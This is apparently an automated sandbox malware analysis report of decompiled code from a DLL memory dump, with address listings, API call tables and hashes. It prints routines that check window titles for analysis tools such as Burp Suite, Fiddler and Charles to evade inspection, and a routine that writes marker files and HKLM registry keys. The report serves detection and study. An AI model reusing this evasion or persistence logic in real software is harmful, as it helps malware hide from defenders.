                                                                                                                                                                  0x10021653
                                                                                                                                                                  0x1002165b
                                                                                                                                                                  0x10021670
                                                                                                                                                                  0x1002167b
                                                                                                                                                                  0x1002167f
                                                                                                                                                                  0x10021692
                                                                                                                                                                  0x100216ac
                                                                                                                                                                  0x100216ba
                                                                                                                                                                  0x100216c1
                                                                                                                                                                  0x100216c5
                                                                                                                                                                  0x100216d8
                                                                                                                                                                  0x100216dd
                                                                                                                                                                  0x100216e6
                                                                                                                                                                  0x10021708
                                                                                                                                                                  0x1002170d
                                                                                                                                                                  0x1002170d
                                                                                                                                                                  0x10021717
                                                                                                                                                                  0x1002171c
                                                                                                                                                                  0x10021722
                                                                                                                                                                  0x1002172b
                                                                                                                                                                  0x1002173e
                                                                                                                                                                  0x10021743
                                                                                                                                                                  0x10021743
                                                                                                                                                                  0x1002174c
                                                                                                                                                                  0x1002174c
                                                                                                                                                                  0x10021753
                                                                                                                                                                  0x1002176c
                                                                                                                                                                  0x10021771
                                                                                                                                                                  0x10021776
                                                                                                                                                                  0x1002177c
                                                                                                                                                                  0x10021786
                                                                                                                                                                  0x10021790
                                                                                                                                                                  0x100217a5
                                                                                                                                                                  0x100217ad
                                                                                                                                                                  0x100217c2
                                                                                                                                                                  0x100217ca
                                                                                                                                                                  0x100217df
                                                                                                                                                                  0x100217e7
                                                                                                                                                                  0x100217fc
                                                                                                                                                                  0x1002180d
                                                                                                                                                                  0x10021812
                                                                                                                                                                  0x10021815
                                                                                                                                                                  0x10021822
                                                                                                                                                                  0x10021942
                                                                                                                                                                  0x10021947
                                                                                                                                                                  0x10021954
                                                                                                                                                                  0x10021959
                                                                                                                                                                  0x10021968
                                                                                                                                                                  0x1002196d
                                                                                                                                                                  0x10021986
                                                                                                                                                                  0x1002198b
                                                                                                                                                                  0x1002198e
                                                                                                                                                                  0x100219a9
                                                                                                                                                                  0x100219af
                                                                                                                                                                  0x100219b4
                                                                                                                                                                  0x100219ba
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100219ce
                                                                                                                                                                  0x100219e4
                                                                                                                                                                  0x10021a0b
                                                                                                                                                                  0x10021a2e
                                                                                                                                                                  0x10021a52
                                                                                                                                                                  0x10021a91
                                                                                                                                                                  0x10021aa7
                                                                                                                                                                  0x10021abd
                                                                                                                                                                  0x10021ada
                                                                                                                                                                  0x10021ae8
                                                                                                                                                                  0x10021aef
                                                                                                                                                                  0x10021af3
                                                                                                                                                                  0x10021b06
                                                                                                                                                                  0x10021b0b
                                                                                                                                                                  0x10021b11
                                                                                                                                                                  0x10021b14
                                                                                                                                                                  0x10021b1d
                                                                                                                                                                  0x10021b32
                                                                                                                                                                  0x10021b36
                                                                                                                                                                  0x10021b3b
                                                                                                                                                                  0x10021b3b
                                                                                                                                                                  0x10021b45
                                                                                                                                                                  0x10021b4a
                                                                                                                                                                  0x10021b50
                                                                                                                                                                  0x100219a0
                                                                                                                                                                  0x100219a0
                                                                                                                                                                  0x100219a3
                                                                                                                                                                  0x100219a3
                                                                                                                                                                  0x10021b58
                                                                                                                                                                  0x10021b62
                                                                                                                                                                  0x10021b67
                                                                                                                                                                  0x10021b71
                                                                                                                                                                  0x10021b76
                                                                                                                                                                  0x10021b83
                                                                                                                                                                  0x10021828
                                                                                                                                                                  0x10021848
                                                                                                                                                                  0x10021871
                                                                                                                                                                  0x10021887
                                                                                                                                                                  0x1002189d
                                                                                                                                                                  0x100218ba
                                                                                                                                                                  0x100218c8
                                                                                                                                                                  0x100218cf
                                                                                                                                                                  0x100218d3
                                                                                                                                                                  0x100218e6
                                                                                                                                                                  0x100218eb
                                                                                                                                                                  0x100218f4
                                                                                                                                                                  0x10021916
                                                                                                                                                                  0x1002191b
                                                                                                                                                                  0x1002191b
                                                                                                                                                                  0x10021925
                                                                                                                                                                  0x1002192a
                                                                                                                                                                  0x10021930
                                                                                                                                                                  0x10021930
                                                                                                                                                                  0x10021822
                                                                                                                                                                  0x10021776
                                                                                                                                                                  0x10021b88
                                                                                                                                                                  0x10021b8f
                                                                                                                                                                  0x10021ba4
                                                                                                                                                                  0x10021baf
                                                                                                                                                                  0x10021bb3
                                                                                                                                                                  0x10021bc3
                                                                                                                                                                  0x10021bc8
                                                                                                                                                                  0x10021bd1
                                                                                                                                                                  0x10021bf3
                                                                                                                                                                  0x10021bf8
                                                                                                                                                                  0x10021bf8
                                                                                                                                                                  0x10021c0d
                                                                                                                                                                  0x10021c16
                                                                                                                                                                  0x10021c21

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 854390245-0
                                                                                                                                                                  • Opcode ID: 32f6cbe5084832234cf5b37318cbf1dc11104bf1af1b1b208e41874a49aca06a
                                                                                                                                                                  • Instruction ID: cf3fdb6315e205635e4887c8713e315fd67cdd6efcc5cedbeed1e245040bfa00
                                                                                                                                                                  • Opcode Fuzzy Hash: 32f6cbe5084832234cf5b37318cbf1dc11104bf1af1b1b208e41874a49aca06a
                                                                                                                                                                  • Instruction Fuzzy Hash: F50292B6D00208ABDB10DB54DC82FDE777CEB58244F444598F509A7285EB75BB88CFA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10011936, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E10011936(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10335478 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1033547c = GetProcAddress(_t37, "FlsGetValue");
					 *0x10335480 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10335478;
					_t40 = TlsSetValue;
					 *0x10335484 = _t7;
					if( *0x10335478 == 0) {
						L6:
						 *0x1033547c = TlsGetValue;
						 *0x10335478 = E100115ED;
						 *0x10335480 = _t40;
						 *0x10335484 = TlsFree;
					} else {
						__eflags =  *0x1033547c;
						if( *0x1033547c == 0) {
							goto L6;
						} else {
							__eflags =  *0x10335480;
							if( *0x10335480 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10334594 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1033547c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10011D56();
							 *0x10335478 = E1001151E( *0x10335478);
							 *0x1033547c = E1001151E( *0x1033547c);
							 *0x10335480 = E1001151E( *0x10335480);
							 *0x10335484 = E1001151E( *0x10335484);
							_t18 = E1000F8ED();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10011620();
								goto L15;
							} else {
								_push(L100117AC);
								_t21 =  *((intOrPtr*)(E1001158A( *0x10335478)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10334590 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E10014911(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10334590);
										__eflags =  *((intOrPtr*)(E1001158A( *0x10335480)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E1001165D(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10011620();
					return 0;
				}
			}
















                                                                                                                                                                  0x10011936
                                                                                                                                                                  0x10011942
                                                                                                                                                                  0x10011946
                                                                                                                                                                  0x10011966
                                                                                                                                                                  0x10011973
                                                                                                                                                                  0x10011980
                                                                                                                                                                  0x10011985
                                                                                                                                                                  0x10011987
                                                                                                                                                                  0x1001198e
                                                                                                                                                                  0x10011994
                                                                                                                                                                  0x10011999
                                                                                                                                                                  0x100119b1
                                                                                                                                                                  0x100119b6
                                                                                                                                                                  0x100119c0
                                                                                                                                                                  0x100119ca
                                                                                                                                                                  0x100119d0
                                                                                                                                                                  0x1001199b
                                                                                                                                                                  0x1001199b
                                                                                                                                                                  0x100119a2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100119a4
                                                                                                                                                                  0x100119a4
                                                                                                                                                                  0x100119ab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100119ad
                                                                                                                                                                  0x100119ad
                                                                                                                                                                  0x100119af
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100119af
                                                                                                                                                                  0x100119ab
                                                                                                                                                                  0x100119a2
                                                                                                                                                                  0x100119d5
                                                                                                                                                                  0x100119db
                                                                                                                                                                  0x100119de
                                                                                                                                                                  0x100119e3
                                                                                                                                                                  0x10011ab5
                                                                                                                                                                  0x10011ab5
                                                                                                                                                                  0x10011ab5
                                                                                                                                                                  0x100119e9
                                                                                                                                                                  0x100119f0
                                                                                                                                                                  0x100119f2
                                                                                                                                                                  0x100119f4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100119fa
                                                                                                                                                                  0x100119fa
                                                                                                                                                                  0x10011a10
                                                                                                                                                                  0x10011a20
                                                                                                                                                                  0x10011a30
                                                                                                                                                                  0x10011a3d
                                                                                                                                                                  0x10011a42
                                                                                                                                                                  0x10011a47
                                                                                                                                                                  0x10011a49
                                                                                                                                                                  0x10011ab0
                                                                                                                                                                  0x10011ab0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10011a4b
                                                                                                                                                                  0x10011a4b
                                                                                                                                                                  0x10011a5c
                                                                                                                                                                  0x10011a5e
                                                                                                                                                                  0x10011a61
                                                                                                                                                                  0x10011a66
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10011a68
                                                                                                                                                                  0x10011a74
                                                                                                                                                                  0x10011a76
                                                                                                                                                                  0x10011a7a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10011a7c
                                                                                                                                                                  0x10011a7c
                                                                                                                                                                  0x10011a7d
                                                                                                                                                                  0x10011a91
                                                                                                                                                                  0x10011a93
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10011a95
                                                                                                                                                                  0x10011a95
                                                                                                                                                                  0x10011a97
                                                                                                                                                                  0x10011a98
                                                                                                                                                                  0x10011a9f
                                                                                                                                                                  0x10011aa5
                                                                                                                                                                  0x10011aa9
                                                                                                                                                                  0x10011aad
                                                                                                                                                                  0x10011aad
                                                                                                                                                                  0x10011a93
                                                                                                                                                                  0x10011a7a
                                                                                                                                                                  0x10011a66
                                                                                                                                                                  0x10011a49
                                                                                                                                                                  0x100119f4
                                                                                                                                                                  0x10011ab9
                                                                                                                                                                  0x10011948
                                                                                                                                                                  0x10011948
                                                                                                                                                                  0x10011950
                                                                                                                                                                  0x10011950

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000EA1D), ref: 1001193C
                                                                                                                                                                  • __mtterm.LIBCMT ref: 10011948
                                                                                                                                                                    • Part of subcall function 10011620: __decode_pointer.LIBCMT ref: 10011631
                                                                                                                                                                    • Part of subcall function 10011620: TlsFree.KERNEL32(00000020,10011AB5), ref: 1001164B
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001195E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001196B
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10011978
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10011985
                                                                                                                                                                  • TlsAlloc.KERNEL32 ref: 100119D5
                                                                                                                                                                  • TlsSetValue.KERNEL32(00000000), ref: 100119F0
                                                                                                                                                                  • __init_pointers.LIBCMT ref: 100119FA
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A05
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A15
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A25
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A35
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 10011A56
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 10011A6F
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 10011A89
                                                                                                                                                                  • __initptd.LIBCMT ref: 10011A98
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 10011A9F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                  • API String ID: 2657569430-3819984048
                                                                                                                                                                  • Opcode ID: 93fa50452aaafecd530976381e4c398f97edee3f3156b12a78c3b9aad9b59f54
                                                                                                                                                                  • Instruction ID: 808ad0af3f4b6be62188e372f3d3457f3cdf16e918fc8b475f3418519981f6d4
                                                                                                                                                                  • Opcode Fuzzy Hash: 93fa50452aaafecd530976381e4c398f97edee3f3156b12a78c3b9aad9b59f54
                                                                                                                                                                  • Instruction Fuzzy Hash: 16318F358042219AE709EF76ACC56893AB9EB84296F52062AF569DF1E3DF31D4C09B10
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019430, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 188COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019430(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t57;
				void* _t61;
				void* _t66;
				void* _t88;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t87 = __edi;
				_t70 = __ebx;
				_v532 = 0;
				E1000CF80(__edi,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF80(_t87,  &_v267, 0, 0x103);
				GetClassNameA(_a4,  &_v532, 0x104);
				GetWindowTextA(_a4,  &_v268, 0x104);
				_t35 = E1000CAD0( &_v532);
				_t91 = _t88 + 0x1c;
				_t108 = _t35;
				if(_t35 <= 0) {
					L30:
					return 1;
				}
				_t37 = E10019390(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
				_t92 = _t91 + 8;
				if(_t37 == 0) {
					_t38 = E10019390(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
					_t93 = _t92 + 8;
					__eflags = _t38;
					if(__eflags == 0) {
						_t39 = E10019390(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
						_t94 = _t93 + 8;
						__eflags = _t39;
						if(__eflags == 0) {
							_t41 = E10019390(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
							_t95 = _t94 + 8;
							__eflags = _t41;
							if(__eflags == 0) {
								_t42 = E10019390(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
								_t96 = _t95 + 8;
								__eflags = _t42;
								if(_t42 == 0) {
									_t43 = E1000CAD0( &_v268);
									_t97 = _t96 + 4;
									__eflags = _t43;
									if(__eflags <= 0) {
										L20:
										_t45 = E1000CAD0( &_v268);
										_t98 = _t97 + 4;
										__eflags = _t45;
										if(__eflags <= 0) {
											L23:
											_t46 = E10019390(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
											_t99 = _t98 + 8;
											__eflags = _t46;
											if(_t46 == 0) {
												goto L30;
											}
											_t48 = E1000CAD0( &_v268);
											_t100 = _t99 + 4;
											__eflags = _t48;
											if(__eflags <= 0) {
												L27:
												__eflags = E1000CAD0( &_v268);
												if(__eflags <= 0) {
													goto L30;
												}
												_t51 = E10019390(_t70, _t87, __eflags,  &_v268, "Burp Suite");
												__eflags = _t51;
												if(_t51 == 0) {
													goto L30;
												}
												 *0x10335dcc = 1;
												return 0;
											}
											_t53 = E10019390(_t70, _t87, __eflags,  &_v268, "Charles");
											_t100 = _t100 + 8;
											__eflags = _t53;
											if(_t53 == 0) {
												goto L27;
											}
											 *0x10335dcc = 1;
											return 0;
										}
										_t55 = E10019390(_t70, _t87, __eflags,  &_v268, "ASExplorer");
										_t98 = _t98 + 8;
										__eflags = _t55;
										if(__eflags == 0) {
											goto L23;
										}
										 *0x10335dcc = 1;
										return 0;
									}
									_t57 = E10019390(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
									_t97 = _t97 + 8;
									__eflags = _t57;
									if(_t57 == 0) {
										goto L20;
									}
									 *0x10335dcc = 1;
									return 0;
								}
								__eflags = E1000CAD0( &_v268);
								if(__eflags <= 0) {
									L16:
									goto L30;
								}
								_t61 = E10019390(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
								__eflags = _t61;
								if(_t61 == 0) {
									goto L16;
								}
								 *0x10335dcc = 1;
								return 0;
							}
							 *0x10335dcc = 1;
							return 0;
						}
						 *0x10335dcc = 1;
						return 0;
					}
					 *0x10335dcc = 1;
					return 0;
				}
				_t66 = E1000CAD0( &_v268);
				_t110 = _t66;
				if(_t66 <= 0 || E10019390(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
					goto L30;
				} else {
					 *0x10335dcc = 1;
					return 0;
				}
			}


































                                                                                                                                                                  0x10019430
                                                                                                                                                                  0x10019430
                                                                                                                                                                  0x10019439
                                                                                                                                                                  0x1001944e
                                                                                                                                                                  0x10019456
                                                                                                                                                                  0x1001946b
                                                                                                                                                                  0x10019483
                                                                                                                                                                  0x10019499
                                                                                                                                                                  0x100194a6
                                                                                                                                                                  0x100194ab
                                                                                                                                                                  0x100194ae
                                                                                                                                                                  0x100194b0
                                                                                                                                                                  0x10019700
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019700
                                                                                                                                                                  0x100194c2
                                                                                                                                                                  0x100194c7
                                                                                                                                                                  0x100194cc
                                                                                                                                                                  0x1001951b
                                                                                                                                                                  0x10019520
                                                                                                                                                                  0x10019523
                                                                                                                                                                  0x10019525
                                                                                                                                                                  0x10019549
                                                                                                                                                                  0x1001954e
                                                                                                                                                                  0x10019551
                                                                                                                                                                  0x10019553
                                                                                                                                                                  0x10019577
                                                                                                                                                                  0x1001957c
                                                                                                                                                                  0x1001957f
                                                                                                                                                                  0x10019581
                                                                                                                                                                  0x100195a5
                                                                                                                                                                  0x100195aa
                                                                                                                                                                  0x100195ad
                                                                                                                                                                  0x100195af
                                                                                                                                                                  0x100195f9
                                                                                                                                                                  0x100195fe
                                                                                                                                                                  0x10019601
                                                                                                                                                                  0x10019603
                                                                                                                                                                  0x10019633
                                                                                                                                                                  0x1001963a
                                                                                                                                                                  0x1001963f
                                                                                                                                                                  0x10019642
                                                                                                                                                                  0x10019644
                                                                                                                                                                  0x10019674
                                                                                                                                                                  0x10019680
                                                                                                                                                                  0x10019685
                                                                                                                                                                  0x10019688
                                                                                                                                                                  0x1001968a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019693
                                                                                                                                                                  0x10019698
                                                                                                                                                                  0x1001969b
                                                                                                                                                                  0x1001969d
                                                                                                                                                                  0x100196c7
                                                                                                                                                                  0x100196d6
                                                                                                                                                                  0x100196d8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100196e6
                                                                                                                                                                  0x100196ee
                                                                                                                                                                  0x100196f0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100196f2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100196fc
                                                                                                                                                                  0x100196ab
                                                                                                                                                                  0x100196b0
                                                                                                                                                                  0x100196b3
                                                                                                                                                                  0x100196b5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100196b7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100196c1
                                                                                                                                                                  0x10019652
                                                                                                                                                                  0x10019657
                                                                                                                                                                  0x1001965a
                                                                                                                                                                  0x1001965c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001965e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019668
                                                                                                                                                                  0x10019611
                                                                                                                                                                  0x10019616
                                                                                                                                                                  0x10019619
                                                                                                                                                                  0x1001961b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001961d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019627
                                                                                                                                                                  0x100195c0
                                                                                                                                                                  0x100195c2
                                                                                                                                                                  0x100195ed
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100195ed
                                                                                                                                                                  0x100195d0
                                                                                                                                                                  0x100195d8
                                                                                                                                                                  0x100195da
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100195dc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100195e6
                                                                                                                                                                  0x10019583
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001958d
                                                                                                                                                                  0x10019555
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001955f
                                                                                                                                                                  0x10019527
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019531
                                                                                                                                                                  0x100194d5
                                                                                                                                                                  0x100194dd
                                                                                                                                                                  0x100194df
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100194f9
                                                                                                                                                                  0x100194f9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019503

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001944E
                                                                                                                                                                  • _memset.LIBCMT ref: 1001946B
                                                                                                                                                                  • GetClassNameA.USER32(?,00000000,00000104), ref: 10019483
                                                                                                                                                                  • GetWindowTextA.USER32 ref: 10019499
                                                                                                                                                                  • _strlen.LIBCMT ref: 100194A6
                                                                                                                                                                    • Part of subcall function 10019390: _strlen.LIBCMT ref: 1001939B
                                                                                                                                                                    • Part of subcall function 10019390: _strlen.LIBCMT ref: 100193A9
                                                                                                                                                                  • _strlen.LIBCMT ref: 100194D5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _strlen$_memset$ClassNameTextWindow
                                                                                                                                                                  • String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
                                                                                                                                                                  • API String ID: 1565133231-1140939848
                                                                                                                                                                  • Opcode ID: 0ad7c26c6e480e82f6b3811a957d2b8bad39d8203231eaa86610e8d92c2d0a26
                                                                                                                                                                  • Instruction ID: 51e88d16b42fffacdf90acd9036bc3218a7670d11f06c4b4a6332502e68566f8
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ad7c26c6e480e82f6b3811a957d2b8bad39d8203231eaa86610e8d92c2d0a26
                                                                                                                                                                  • Instruction Fuzzy Hash: 7851B6B991430956E710CB71AC89FDA72B8EB20345F440864F91ADD182FBB1F7C8CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001FA90, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 137COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E1001FA90(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				char _v536;
				char _v803;
				char _v804;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t55;
				void* _t94;

				_t94 = __eflags;
				_t77 = __edi;
				_v536 = 0;
				_v532 = 0;
				E1000CF80(__edi,  &_v531, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0);
				E1000CDB3( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
				_v804 = 0;
				E1000CF80(_t77,  &_v803, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
				E1000CDB3( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
				_v268 = 0;
				E1000CF80(_t77,  &_v267, 0, 0x103);
				E1001F9F0(__ebx, _t77, __esi, _t94,  &_v268);
				_t44 = E1001F6E0(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8);
				_t95 = _t44;
				if(_t44 != 0) {
					_t46 = E1001F6E0(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8);
					_t96 = _t46;
					if(_t46 != 0) {
						_t48 = E1001F650( &_v532, _t96,  &_v532, _a4, _a8);
						_t97 = _t48;
						if(_t48 != 0) {
							_t50 = E1001F6E0( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8);
							_t98 = _t50;
							if(_t50 != 0) {
								_t52 = E1001F6E0(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8);
								_t99 = _t52;
								if(_t52 != 0 && E1001F650(_a4, _t99,  &_v804, _a4, _a8) != 0) {
									_t55 = E1001F780(__ebx, _t77, __esi, _a4, _a8);
									_t101 = _t55;
									if(_t55 != 0 && E1001F6E0( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8) != 0) {
										_v536 = 1;
									}
								}
							}
						}
					}
				}
				return _v536;
			}

















                                                                                                                                                                  0x1001fa90
                                                                                                                                                                  0x1001fa90
                                                                                                                                                                  0x1001fa99
                                                                                                                                                                  0x1001faa3
                                                                                                                                                                  0x1001fab8
                                                                                                                                                                  0x1001facd
                                                                                                                                                                  0x1001fae4
                                                                                                                                                                  0x1001faec
                                                                                                                                                                  0x1001fb01
                                                                                                                                                                  0x1001fb16
                                                                                                                                                                  0x1001fb2d
                                                                                                                                                                  0x1001fb35
                                                                                                                                                                  0x1001fb4a
                                                                                                                                                                  0x1001fb59
                                                                                                                                                                  0x1001fb73
                                                                                                                                                                  0x1001fb7b
                                                                                                                                                                  0x1001fb7d
                                                                                                                                                                  0x1001fb95
                                                                                                                                                                  0x1001fb9d
                                                                                                                                                                  0x1001fb9f
                                                                                                                                                                  0x1001fbb4
                                                                                                                                                                  0x1001fbbc
                                                                                                                                                                  0x1001fbbe
                                                                                                                                                                  0x1001fbd6
                                                                                                                                                                  0x1001fbde
